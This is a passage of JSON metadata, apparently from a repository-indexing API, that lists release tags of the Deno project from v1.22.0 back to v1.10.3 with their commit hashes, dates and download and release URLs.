enoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/de